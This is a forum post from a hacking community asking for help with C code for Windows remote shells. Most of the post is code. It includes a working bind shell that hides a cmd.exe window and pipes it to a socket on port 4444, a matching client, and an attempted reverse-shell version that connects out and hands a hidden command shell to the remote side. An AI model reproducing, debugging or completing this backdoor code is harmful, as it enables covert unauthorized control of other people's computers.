Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
[c/c++] remote shell
I will give you the code, it isn't long…
first try this 2 programs (they work very well): server:
#define WIN32_LEAN_AND_MEAN
#include "sock.h"
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib,"Ws2_32.lib")
#define SHELL_NAME "cmd\0"
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
SOCKET sock, sendrecv;
struct sockaddr_in sock_addr,sendrecv_addr;
WSADATA data;
WORD p;
int len;
SECURITY_ATTRIBUTES sa;
STARTUPINFO si;
PROCESS_INFORMATION pi;
//connessione modalità server...
p=MAKEWORD(2,0);
WSAStartup(p,&data);
sock = WSASocket (AF_INET, SOCK_STREAM, 0, 0, 0, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(4444); sock_addr.sin_addr.s_addr=INADDR_ANY;
bind(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr_in));
listen(sock,1);
int lun = sizeof (struct sockaddr);
sendrecv = accept(sock,(struct sockaddr*)&sendrecv_addr,&lun);
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
memset((void *) &si, 0, sizeof(si));
memset((void *) &pi, 0, sizeof(pi));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdInput = (void *)sendrecv;
si.hStdOutput = (void *)sendrecv;
si.hStdError = (void *)sendrecv;
CreateProcess(NULL, SHELL_NAME, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
closesocket(sendrecv);
closesocket(sock);
WSACleanup();
return 0;
}
client:
#include "sock.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib,"Ws2_32.lib") //Winsocket lib
#define SHELL_NAME "cmd\0"
int main(){
SOCKET sock, sendrecv;
sendrecv = InitClientSocket("127.0.0.1", 4444);
if (sendrecv == 0){
MessageBox(0,"connection ok","shell",MB_OK);
}
char pBuffer[2000];
int iBytes;
while(TRUE){
while(TRUE){
iBytes = recv(sendrecv,pBuffer,2000,0);
pBuffer[iBytes] = '\0';
printf("%s",pBuffer);
if(pBuffer[iBytes-1] == '>') break;
}
pBuffer[0] = '\0';
gets(pBuffer);
send(sendrecv, pBuffer,lstrlen(pBuffer),0);
pBuffer[0] = '\n';pBuffer[1] = '\0';
send(sendrecv, pBuffer,lstrlen(pBuffer),0);
}
system("pause");
return 0;
}
InitClientSocket():
SOCKET InitClientSocket(char *pHost, int iPort){
struct sockaddr_in saClient;
struct hostent *pHostinfo;
SOCKET sock;
WORD version;
WSADATA WSAData;
version=MAKEWORD(1,1);
WSAStartup(version, &WSAData);
//Avvia il socket
if ((sock=socket(AF_INET,SOCK_STREAM,0))==SOCKET_ERROR){
return 0;
}
//Risolve il DNS
pHostinfo=gethostbyname(pHost);
if (pHostinfo==NULL){
return 0;
}
//Imposta la connessione con il server...
saClient.sin_family=AF_INET;
saClient.sin_addr=*((struct in_addr *)pHostinfo->h_addr);
saClient.sin_port=htons(iPort);
//Si connette al server...
if (connect(sock,(struct sockaddr *)&saClient, sizeof(saClient))){
return 0;
}
return sock;
}
after this two programs, i tried to do the opposite, but it doesn't work, and here i need your help…
server:
#include "sock.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock2.h> //includo la libreria per le funzioni della versione 2 del winsock
#include <time.h>
#pragma comment(lib,"Ws2_32.lib") //Winsocket lib
#define SHELL_NAME "cmd\0"
int main(){
char pBuffer[64000];
int iBytes;
SOCKET sock, sendrecv;
struct sockaddr_in sock_addr,sendrecv_addr;
WSADATA data;
WORD p;
int len;
SECURITY_ATTRIBUTES sa;
STARTUPINFO si;
PROCESS_INFORMATION pi;
//connessione modalità server...
p=MAKEWORD(2,0);
WSAStartup(p,&data);
sock = WSASocket (AF_INET, SOCK_STREAM, 0, 0, 0, 0); //utilizzo la WSASocket() invece della socket()
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(4444); //Utilizzo la porta 4444
sock_addr.sin_addr.s_addr=INADDR_ANY;
bind(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr_in));
listen(sock,1);
int lun = sizeof (struct sockaddr);
sendrecv = accept(sock,(struct sockaddr*)&sendrecv_addr,&lun);
char buffer[100];
recv(sendrecv,buffer,sizeof(buffer),0);
printf("%s\n",buffer);
SendTo(sendrecv,"ciao client, sono il server...");
Sleep(2000);
while(TRUE){
while(TRUE){
iBytes = recv(sendrecv,pBuffer,64000,0);
pBuffer[iBytes] = '\0';
printf("%s",pBuffer);
if(pBuffer[iBytes-1] == '>') break;
}
pBuffer[0] = '\0';
gets(pBuffer);
send(sendrecv, pBuffer,lstrlen(pBuffer),0);
pBuffer[0] = '\n';pBuffer[1] = '\0';
send(sendrecv, pBuffer,lstrlen(pBuffer),0);
}
system("pause");
return 0;
}
client:
#define WIN32_LEAN_AND_MEAN
#include "sock.h"
#include <stdio.h>
#include <windows.h>
#include <winsock2.h> //includo la libreria per le funzioni della versione 2 del winsock
#include <time.h>
#pragma comment(lib,"Ws2_32.lib") //Winsocket lib
#define SHELL_NAME "cmd\0"
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
SOCKET sock, sendrecv;
struct sockaddr_in sock_addr,sendrecv_addr;
WSADATA data;
WORD p;
int len;
SECURITY_ATTRIBUTES sa;
STARTUPINFO si;
PROCESS_INFORMATION pi;
sendrecv = InitClientSocket("127.0.0.1", 4444);
if (sendrecv == 0){
MessageBox(0,"connessione non avvenuta","shell",MB_OK);
}
SendTo(sendrecv,"ciao server, sono il client...");
char buffer[100];
recv(sendrecv,buffer,sizeof(buffer),0);
printf("%s\n",buffer);
Sleep(5000);
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
memset((void *) &si, 0, sizeof(si));
memset((void *) &pi, 0, sizeof(pi));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdInput = (void *)sendrecv; // posso assegnare lo standard input direttamente alla socket
si.hStdOutput = (void *)sendrecv; // devo utilizzare un cast in quanto la socket ?n intero,
si.hStdError = (void *)sendrecv; // mentre io ho bisogno di una variabile tipo Handle (puntatore a void)
CreateProcess(NULL, SHELL_NAME, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
closesocket(sendrecv);
closesocket(sock);
WSACleanup();
return 0;
}
thanks again and sorry for the potentially weird zip file…